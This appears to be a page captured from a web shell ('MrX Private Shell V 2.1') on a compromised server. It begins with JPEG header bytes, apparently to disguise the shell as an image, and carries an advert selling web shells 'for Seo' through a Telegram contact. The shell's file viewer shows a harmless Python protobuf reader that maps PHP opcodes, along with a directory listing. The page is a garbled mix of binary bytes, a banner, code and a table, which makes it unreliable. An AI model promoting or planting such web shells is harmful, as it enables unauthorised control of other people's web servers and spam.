����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import io
import struct
import sendmessage_pb2
import subprocess
def readDataFromStream(stream_data):
proto_size_rd = stream_data.read(2)
if len(proto_size_rd)==0:
return ""
proto_size, = struct.unpack('>H', proto_size_rd)
data = stream_data.read(proto_size)
item = sendmessage_pb2.SendInfo()
item.ParseFromString(data)
return item
def translateQueueItem(item, php_dict):
result = ""
packed = list(struct.pack('<L', item))
b1=int(packed[0].encode('hex'), 16)
b2=int(packed[1].encode('hex'), 16)
b3=int(packed[2].encode('hex'), 16)
b4=int(packed[3].encode('hex'), 16)
if b1==1:
result = "ANYOP(%d,%d)"%(b3, b4)
elif b4>0:
result = "%s(%s)"%(php_dict[b1], php_dict[b4])
else:
result = "%s"%(php_dict[b1])
return result
def fillDictionary():
php_dict = {}
counter = 0
proc = subprocess.Popen(['dict_util'],stdout=subprocess.PIPE)
while True:
line = proc.stdout.readline()
if line != '':
if counter>1:
res = line.rstrip().split()
if len(res)>1:
php_dict[int(res[0])]=res[1].rstrip()
else:
break
counter=counter+1
return php_dict
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| example1.py | File | 318 B | 0644 |
|
| example2.py | File | 1.3 KB | 0644 |
|
| example2_old.py | File | 1.04 KB | 0644 |
|
| message_reader.py | File | 727 B | 0644 |
|
| message_reader_old.py | File | 1.12 KB | 0644 |
|
| sendmessage_pb2.py | File | 18.75 KB | 0644 |
|